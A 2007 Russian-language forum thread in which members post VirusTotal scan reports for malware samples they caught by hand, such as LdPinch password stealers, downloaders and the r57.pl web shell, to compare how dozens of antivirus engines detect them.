# Форум на русском языке  > Аналитика  > Тестирование  >  Исследование антивирусов 5

## anton_dr

> В общем думал я думал как сделать более-менее объективную оценку антивирусов, и кое что придумал. Вот в эту тему прошу всех постить результаты проверки зверей которые были пойманы исключительно ручками. Т.е. которых не видел установленный на компютере антивирус. Так выборка будет по настоящему случайной.
> 
> Постить в эту тему результаты проверки файлов исключительно пойманных руками на компьютерах.
> 
> *Не* постить результаты проверки файлов найденных на других сайтах или в коллекциях. 
> *Не* постить результаты проверки файлов изначально найденных антивирусом.




Продолжим в новой теме, так как появились новые действующие лица.
Предыдущий топик здесь. Результаты его в прикрепленном файле. Спасибо *Shu_b* за титанический труд  :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## borka

> Спасибо *Shu_b* за титанический труд


Shu_b, респект.  :Smiley:

----------


## Winsent

Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.08.2007	TR/Dldr.Injloader.A*
Authentium	4.93.8	12.30.2006	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.08.2007	no virus found
BitDefender	7.2	01.08.2007	no virus found
*CAT-QuickHeal	9.00	01.08.2007	TrojanDownloader.Agent.aii*
ClamAV	devel-20060426	01.08.2007	no virus found
*DrWeb	4.33	01.08.2007	Trojan.DownLoader.17213
eSafe	7.0.14.0	01.08.2007	suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.107	01.06.2007	no virus found
eTrust-Vet	30.3.3311	01.08.2007	no virus found
*Ewido	4.0	01.08.2007	Downloader.Agent.aii*
Fortinet	2.82.0.0	01.08.2007	no virus found
F-Prot	3.16f	01.05.2007	no virus found
F-Prot4	4.2.1.29	01.05.2007	no virus found
Ikarus	T3.1.0.27	01.08.2007	no virus found
Kaspersky	4.0.2.24	01.08.2007	no virus found
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.07.2007	no virus found
NOD32v2	1963	01.08.2007	no virus found
*Norman	5.80.02	12.31.2007	W32/Malware
Panda	9.0.0.4	01.07.2007	Suspicious file*
Prevx1	V2	01.08.2007	no virus found
*Sophos	4.13.0	01.05.2007	Mal/Behav-080*
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.1	01.08.2007	no virus found
VirusBuster	4.3.19:9	01.08.2007	no virus found

Aditional Information
File size: 23552 bytes
MD5: 073bc4974a0c451b0f1145338f19ef53
SHA1: e1fc27d75f1aee86935554726c103cd30ed56883
packers: UPX
packers: UPX
packers: UPX
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Decompressing UPX.
* File length: 23552 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "mail.exe", received in VirusTotal at 01.09.2007, 08:17:19 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.08.2007	TR/PSW.LdPinch.bjf*
Authentium	4.93.8	12.30.2006	could be a corrupted executable file
Avast	4.7.892.0	12.30.2006	no virus found
*AVG	386	01.08.2007	PSW.Ldpinch.DHV
BitDefender	7.2	01.09.2007	Trojan.PSW.LdPinch.A
CAT-QuickHeal	9.00	01.08.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
*eSafe	7.0.14.0	01.08.2007	Win32.LdPinch.bjf*
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.08.2007	no virus found
*Fortinet	2.82.0.0	01.09.2007	W32/LdPinch.BJF!tr.pws
F-Prot	3.16f	01.08.2007	Possibly a new variant of W32/CrazyCrunch-based!Maximus*
*F-Prot4	4.2.1.29	01.09.2007	W32/CrazyCrunch-based!Maximus
Ikarus	T3.1.0.27	01.09.2007	Trojan-PSW.Win32.LdPinch.bjf
Kaspersky	4.0.2.24	01.09.2007	Trojan-PSW.Win32.LdPinch.bjf*
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
NOD32v2	1963	01.08.2007	no virus found
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.08.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
*Sunbelt	2.2.907.0	01.05.2007	VIPRE.Suspicious
TheHacker	6.0.3.146	01.08.2007	Trojan/PSW.LdPinch.bjf*
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.2	01.08.2007	no virus found
VirusBuster	4.3.19:9	01.08.2007	no virus found

Aditional Information
File size: 32287 bytes
MD5: eabd75799719ea4f61ac13d6e8fb95fb
SHA1: a407ac7ca8fcb44bfeef1b4c31064896a3b48d18
packers: PecBundle, PECompact
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Winsent

Complete scanning result of "porno.scr", received in VirusTotal at 01.09.2007, 15:50:08 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.09.2007	TR/FwBypass.A.669*
Authentium	4.93.8	12.30.2006	could be a corrupted executable file
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	no virus found
*BitDefender	7.2	01.09.2007	BehavesLike:Trojan.FirewallBypass*
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
*eSafe	7.0.14.0	01.09.2007	suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	no virus found
*Fortinet	2.82.0.0	01.09.2007	suspicious*
F-Prot	3.16f	01.08.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
*Ikarus	T3.1.0.27	01.09.2007	Trojan-PSW.Win32.LdPinch.apk*
Kaspersky	4.0.2.24	01.09.2007	no virus found
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
NOD32v2	1966	01.09.2007	no virus found
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.08.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
*Sunbelt	2.2.907.0	01.05.2007	VIPRE.Suspicious*
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	no virus found

Aditional Information
File size: 53818 bytes
MD5: 5bf0802a969477b8b87d044abea0fd33
SHA1: 79306b7c7032f6f0ef99de08776d9c3c0aa2a844
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

Complete scanning result of "avz00006.dta", received in VirusTotal at 01.09.2007, 19:46:15 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.09.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	Collected.9.AM
BitDefender	7.2	01.09.2007	no virus found
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
eSafe	7.0.14.0	01.09.2007	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	no virus found
Fortinet	2.82.0.0	01.09.2007	suspicious
F-Prot	3.16f	01.09.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.09.2007	no virus found
McAfee	4935	01.09.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
*NOD32v2	1967	01.09.2007	a variant of Win32/Spabot.NAC*
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.09.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.09.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	Trojan.DL.Obfusc.Gen.4

Aditional Information
File size: 90624 bytes
MD5: c733ec1bca41bc95c4da11cbe95654f4
SHA1: 82918417039ee57b4071650d42d4692601ee6ae6
packers: UPX

drweb - Trojan.Spambot

----------


## Shu_b

Complete scanning result of "avz00009__1_._ta", received in VirusTotal at 01.10.2007, 08:28:03 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.21	01.09.2007	TR/Drop.WSO.A.2
Authentium	4.93.8	01.09.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	no virus found
BitDefender	7.2	01.10.2007	Trojan.Downloader.Agent.AEY
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.10.2007	Trojan.Fakealert.229
eSafe	7.0.14.0	01.09.2007	Win32.Downloader
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	Adware.WorldSecurityOnline
Fortinet	2.82.0.0	01.10.2007	W32/FakeAlert
F-Prot	3.16f	01.09.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.10.2007	not-a-virus:FraudTool.Win32.WorldSecurityOnline.c
McAfee	4935	01.09.2007	FakeAlert-G
Microsoft	1.1904	01.10.2007	no virus found
NOD32v2	1968	01.09.2007	Win32/TrojanDownloader.Zlob
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.09.2007	Application/AntiVermins
Prevx1	V2	01.10.2007	Generic.Zlob!DL
Sophos	4.13.0	01.05.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.10.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	no virus found

Aditional Information
File size: 20992 bytes
MD5: 75128e61b82c63deacd8f4975a3e1a99
SHA1: 0c91b00ab6a888030bcda451853b7d46e523de2b

----------


## Winsent

Complete scanning result of "setup.exe", received in VirusTotal at 01.10.2007, 19:16:10 (CET).


Antivirus	Version	Update	Result

AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.10.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.10.2007	no virus found
BitDefender	7.2	01.10.2007	no virus found
CAT-QuickHeal	9.00	01.10.2007	no virus found
ClamAV	devel-20060426	01.10.2007	no virus found
DrWeb	4.33	01.10.2007	no virus found
eSafe	7.0.14.0	01.10.2007	no virus found
eTrust-InoculateIT	23.73.110	01.10.2007	no virus found
eTrust-Vet	30.3.3316	01.10.2007	no virus found
Ewido	4.0	01.10.2007	no virus found
Fortinet	2.82.0.0	01.10.2007	no virus found
F-Prot	3.16f	01.10.2007	no virus found
F-Prot4	4.2.1.29	01.10.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.10.2007	no virus found
McAfee	4935	01.09.2007	no virus found
Microsoft	1.1904	01.10.2007	no virus found
NOD32v2	1970	01.10.2007	no virus found
*Norman	5.80.02	01.10.2007	W32/Malware
Panda	9.0.0.4	01.09.2007	Suspicious file*
Prevx1	V2	01.10.2007	no virus found
Sophos	4.13.0	01.10.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.10.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.10.2007	no virus found

Aditional Information
File size: 49152 bytes
MD5: 398c8390385d73aefce3712c6420076f
SHA1: 292bd5a7d56982a888272cc8134041c42cafddac
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 49152 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "Anna.scr", received in VirusTotal at 01.14.2007, 13:40:38 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.09.2007	HEUR/Crypted*
Authentium	4.93.8	01.12.2007	no virus found
*Avast	4.7.936.0	01.13.2007	Win32dPinch-NO*
AVG	386	01.13.2007	no virus found
*BitDefender	7.2	01.14.2007	MemScan:Trojan.PWS.PdPinch.L
CAT-QuickHeal	9.00	01.12.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.14.2007	Trojan.Dropper.Agent-106
DrWeb	4.33	01.14.2007	Trojan.PWS.LDPinch.1217
eSafe	7.0.14.0	01.14.2007	Suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.113	01.13.2007	no virus found
eTrust-Vet	30.3.3324	01.12.2007	no virus found
Ewido	4.0	01.14.2007	no virus found
Fortinet	2.82.0.0	01.13.2007	no virus found
F-Prot	3.16f	01.12.2007	no virus found
F-Prot4	4.2.1.29	01.12.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
*Kaspersky	4.0.2.24	01.14.2007	Trojan-PSW.Win32.LdPinch.bfy*
McAfee	4938	01.12.2007	no virus found
*Microsoft	1.1904	01.14.2007	Win32/Ldpinch
NOD32v2	1977	01.13.2007	a variant of Win32/PSW.LdPinch.NCB*
Norman	5.80.02	01.12.2007	no virus found
*Panda	9.0.0.4	01.13.2007	Suspicious file*
Prevx1	V2	01.14.2007	no virus found
*Sophos	4.13.0	01.13.2007	Troj/LdPinch-PZ*
*Sunbelt	2.2.907.0	01.12.2007	VIPRE.Suspicious*
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.12.2007	no virus found
*VBA32	3.11.2	01.14.2007	MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.19:9	01.13.2007	no virus found

Aditional Information
File size: 32256 bytes
MD5: 743b218ce24362d18399d169ac9dccb4
SHA1: bc82515174f5a50e3a8b5704263f16a185e80f94
packers: PECompact
packers: PECOMPACT
packers: PecBundle, PECompact
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Winsent

Complete scanning result of "setup.exe", received in VirusTotal at 01.15.2007, 18:19:53 (CET).


Antivirus	Version	Update	Result

AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.15.2007	no virus found
Avast	4.7.936.0	01.15.2007	no virus found
AVG	386	01.15.2007	no virus found
BitDefender	7.2	01.15.2007	no virus found
CAT-QuickHeal	9.00	01.15.2007	no virus found
ClamAV	devel-20060426	01.15.2007	no virus found
DrWeb	4.33	01.15.2007	no virus found
eSafe	7.0.14.0	01.15.2007	no virus found
eTrust-InoculateIT	23.73.113	01.13.2007	no virus found
eTrust-Vet	30.3.3329	01.15.2007	no virus found
*Ewido	4.0	01.15.2007	Downloader.Agent.aii*
Fortinet	2.82.0.0	01.15.2007	no virus found
F-Prot	3.16f	01.15.2007	no virus found
F-Prot4	4.2.1.29	01.12.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.15.2007	no virus found
McAfee	4938	01.12.2007	no virus found
Microsoft	1.1904	01.15.2007	no virus found
NOD32v2	1980	01.15.2007	no virus found
*Norman	5.80.02	01.15.2007	W32/Malware*
*Panda	9.0.0.4	01.14.2007	Suspicious file*
Prevx1	V2	01.15.2007	no virus found
Sophos	4.13.0	01.13.2007	no virus found
Sunbelt	2.2.907.0	01.12.2007	no virus found
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.12.2007	no virus found
*VBA32	3.11.2	01.15.2007	suspected of Trojan-Proxy.Horst.170* (paranoid heuristics)
VirusBuster	4.3.19:9	01.15.2007	no virus found

Aditional Information
File size: 49152 bytes
MD5: 98fe527323b8643dfc97f172c0de5732
SHA1: ff433500cea0f62fc970d88de355025807bf9939
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 49152 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "Mashka.scr", received in VirusTotal at 01.18.2007, 11:10:32 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.17.2007	HEUR/Crypted*
Authentium	4.93.8	01.17.2007	no virus found
Avast	4.7.936.0	01.17.2007	no virus found
AVG	386	01.18.2007	no virus found
*BitDefender	7.2	01.18.2007	MemScan:Trojan.PWS.PdPinch.L
CAT-QuickHeal	9.00	01.17.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.18.2007	no virus found
DrWeb	4.33	01.18.2007	no virus found
*eSafe	7.0.14.0	01.18.2007	Suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.116	01.18.2007	no virus found
eTrust-Vet	30.3.3334	01.18.2007	no virus found
Ewido	4.0	01.17.2007	no virus found
*Fortinet	2.82.0.0	01.18.2007	suspicious*
F-Prot	3.16f	01.17.2007	no virus found
F-Prot4	4.2.1.29	01.17.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
*Kaspersky	4.0.2.24	01.18.2007	Trojan-PSW.Win32.LdPinch.bkc*
McAfee	4941	01.17.2007	no virus found
Microsoft	1.1904	01.18.2007	no virus found
NOD32v2	1988	01.18.2007	no virus found
Norman	5.80.02	01.17.2007	no virus found
*Panda	9.0.0.4	01.17.2007	Suspicious file*
Prevx1	V2	01.18.2007	no virus found
Sophos	4.13.0	01.17.2007	no virus found
*Sunbelt	2.2.907.0	01.12.2007	VIPRE.Suspicious*
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.17.2007	no virus found
VBA32	3.11.2	01.17.2007	no virus found
VirusBuster	4.3.19:9	01.18.2007	no virus found

Aditional Information
File size: 33805 bytes
MD5: a1cae0b3e11a5787892ac677f963b1c8
SHA1: ec3d276cffccd9d4ea86389a96b5667f8a678fe0
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Зайцев Олег

STATUS: FINISHEDComplete scanning result of "_4.exe", received in VirusTotal at 01.18.2007, 17:39:47 (CET).
Antivirus Version Update Result 
AntiVir 7.3.0.21 01.18.2007 HEUR/Crypted 
Authentium 4.93.8 01.17.2007 could be a corrupted executable file 
Avast 4.7.936.0 01.18.2007  no virus found 
AVG 386 01.18.2007  no virus found 
BitDefender 7.2 01.18.2007  no virus found 
CAT-QuickHeal 9.00 01.17.2007  no virus found 
ClamAV devel-20060426 01.18.2007  no virus found 
DrWeb 4.33 01.18.2007  no virus found 
eSafe 7.0.14.0 01.18.2007 suspicious Trojan/Worm 
eTrust-InoculateIT 23.73.116 01.18.2007  no virus found 
eTrust-Vet 30.3.3334 01.18.2007  no virus found 
Ewido 4.0 01.17.2007  no virus found 
Fortinet 2.82.0.0 01.18.2007  no virus found 
F-Prot 3.16f 01.17.2007  no virus found 
F-Prot4 4.2.1.29 01.18.2007  no virus found 
Ikarus T3.1.0.27 01.09.2007 Trojan-PSW.Win32.LdPinch.apk 
Kaspersky 4.0.2.24 01.18.2007  no virus found 
McAfee 4941 01.17.2007  no virus found 
Microsoft 1.1904 01.18.2007  no virus found 
NOD32v2 1988 01.18.2007  no virus found 
Norman 5.80.02 01.18.2007  no virus found 
Panda 9.0.0.4 01.17.2007 Suspicious file 
Prevx1 V2 01.18.2007  no virus found 
Sophos 4.13.0 01.17.2007  no virus found 
Sunbelt 2.2.907.0 01.12.2007 VIPRE.Suspicious 
TheHacker 6.0.3.149 01.18.2007  no virus found 
UNA 1.83 01.17.2007  no virus found 
VBA32 3.11.2 01.18.2007  no virus found 
VirusBuster 4.3.19:9 01.18.2007 no virus found 

Aditional Information 
File size: 26526 bytes 
MD5: 48ae2a22ffd78b439a9c9ecd861d9104 
SHA1: 4d50dcca103b9bd01e53a1e0ca615fa9ede19e26 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics. 

По данным моего анализатора - это модификация пинча.

----------


## anton_dr

Из темы http://virusinfo.info/showthread.php?t=7594

Complete scanning result of "avz00001.dta", received in VirusTotal at 01.20.2007, 14:07:42 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.20.2007	no virus found
Authentium	4.93.8	01.20.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.20.2007	no virus found
*BitDefender	7.2	01.20.2007	Trojan.FatObfus.Gen
CAT-QuickHeal	9.00	01.20.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.20.2007	no virus found
DrWeb	4.33	01.20.2007	no virus found
eSafe	7.0.14.0	01.20.2007	no virus found
eTrust-InoculateIT	23.73.118	01.20.2007	no virus found
eTrust-Vet	30.3.3336	01.19.2007	no virus found
Ewido	4.0	01.19.2007	no virus found
*Fortinet	2.82.0.0	01.20.2007	suspicious*
F-Prot	3.16f	01.20.2007	no virus found
F-Prot4	4.2.1.29	01.19.2007	no virus found
*Ikarus	T3.1.0.27	01.09.2007	not-a-virus:AdWare.Win32.Lop.ag*
Kaspersky	4.0.2.24	01.20.2007	no virus found
McAfee	4943	01.19.2007	no virus found
Microsoft	1.1904	01.20.2007	no virus found
NOD32v2	1992	01.20.2007	no virus found
Norman	5.80.02	01.19.2007	no virus found
*Panda	9.0.0.4	01.20.2007	Suspicious file
Prevx1	V2	01.20.2007	Adware.Lop*
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.12.2007	no virus found
TheHacker	6.0.3.151	01.19.2007	no virus found
UNA	1.83	01.19.2007	no virus found
*VBA32	3.11.2	01.19.2007	suspected of Trojan-Downloader.Obfuscated.1 (paranoid heuristics)*
VirusBuster	4.3.19:9	01.20.2007	no virus found

Aditional Information
File size: 228864 bytes
MD5: 308dd917c8c1cab36df22b25e95c0df1
SHA1: 7bd08b83f5ac23065c049770a459256f1a8fdcdb
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=614c69782788

----------


## Geser

AntiVir 7.3.0.26 01.20.2007 TR/PCK.Klone.V.6 
Authentium 4.93.8 01.20.2007  no virus found 
Avast 4.7.936.0 01.18.2007  no virus found 
AVG 386 01.20.2007 Generic2.MUX 
BitDefender 7.2 01.20.2007 Trojan.Klone.H 
CAT-QuickHeal 9.00 01.20.2007  no virus found 
ClamAV devel-20060426 01.20.2007  no virus found 
DrWeb 4.33 01.20.2007 Trojan.Mezzia 
eSafe 7.0.14.0 01.20.2007 Win32.Klone.v 
eTrust-InoculateIT 23.73.118 01.20.2007 Win32/Nebuler.AO!DLL!Trojan 
eTrust-Vet 30.3.3336 01.19.2007 Win32/Nebuler.AO 
Ewido 4.0 01.20.2007 Trojan.Agent.nff 
Fortinet 2.82.0.0 01.20.2007 W32/Nebule.V!tr 
F-Prot 3.16f 01.20.2007  no virus found 
F-Prot4 4.2.1.29 01.20.2007  no virus found 
Ikarus T3.1.0.27 01.09.2007 Trojan.Win32.Agent.vg 
Kaspersky 4.0.2.24 01.20.2007 Packed.Win32.Klone.v 
McAfee 4943 01.19.2007 BackDoor-CVT 
Microsoft 1.1904 01.20.2007  no virus found 
NOD32v2 1992 01.20.2007 Win32/Agent.NFF 
Norman 5.80.02 01.19.2007 W32/Agent.AUNX 
Panda 9.0.0.4 01.20.2007 Trj/Nebule.B 
Prevx1 V2 01.20.2007 Polynomial.Code.Exploit 
Sophos 4.13.0 01.20.2007 Troj/Nebule-Gen 
Sunbelt 2.2.907.0 01.12.2007 Trojan.Klone.H 
TheHacker 6.0.3.151 01.19.2007 Trojan/Klone.v 
UNA 1.83 01.19.2007 Trojan.Win32.Klone.2C6C 
VBA32 3.11.2 01.19.2007 Trojan.Win32.Agent.NFF

----------


## ISO

Complete scanning result of "r57.pl", received in VirusTotal at 01.22.2007, 09:39:18 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	no virus found
CAT-QuickHeal	9.00	01.22.2007	no virus found
ClamAV	devel-20060426	01.21.2007	no virus found
DrWeb	4.33	01.22.2007	Exploit.phpBB
eSafe	7.0.14.0	01.21.2007	no virus found
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.21.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	no virus found
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	Exploit.Perl.Board.c
McAfee	4943	01.19.2007	Perl/Exploit.gen
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1995	01.21.2007	no virus found
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.21.2007	no virus found
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	no virus found
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	no virus found
VirusBuster	4.3.19:9	01.21.2007	no virus found

Aditional Information
File size: 16761 bytes
MD5: 3175fc5b7fea821faf3b620bf15bee33
SHA1: bf9a27982b610fed8c02c45e2c4704f2b8d6fd55

----------


## ISO

Complete scanning result of "phpRemoteView.php", received in VirusTotal at 01.22.2007, 09:31:40 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	no virus found
CAT-QuickHeal	9.00	01.22.2007	no virus found
ClamAV	devel-20060426	01.21.2007	no virus found
DrWeb	4.33	01.22.2007	no virus found
eSafe	7.0.14.0	01.21.2007	Win32.Hacktool
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.21.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	RAT/RemView
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	not-a-virus:RemoteAdmin.PHP.RemView.a
McAfee	4943	01.19.2007	no virus found
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1995	01.21.2007	PHP/RemoteAdmin.RemView.A
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.21.2007	no virus found
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	no virus found
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	no virus found
VirusBuster	4.3.19:9	01.21.2007	no virus found

Aditional Information
File size: 91159 bytes
MD5: b4a09911a5b23e00b55abe546ded691c
SHA1: 9a5f1bd37fa992b69bbc3f2e8ddfc18cb27c8ea3

----------


## ISO

Complete scanning result of "fsb2.exe", received in VirusTotal at 01.22.2007, 17:12:26 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	HEUR/Crypted
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.22.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	DeepScan:Generic.Dialer.61C27394
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.22.2007	no virus found
DrWeb	4.33	01.22.2007	no virus found
eSafe	7.0.14.0	01.21.2007	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.22.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	suspicious
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	generic
Ikarus	T3.1.0.27	01.22.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	no virus found
McAfee	4944	01.22.2007	no virus found
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1997	01.22.2007	Win32/PSW.LdPinch.BFP
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.22.2007	Suspicious file
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	MalwareScope.Trojan-PSW.Pinch.1
VirusBuster	4.3.19:9	01.22.2007	no virus found

Aditional Information
File size: 36320 bytes
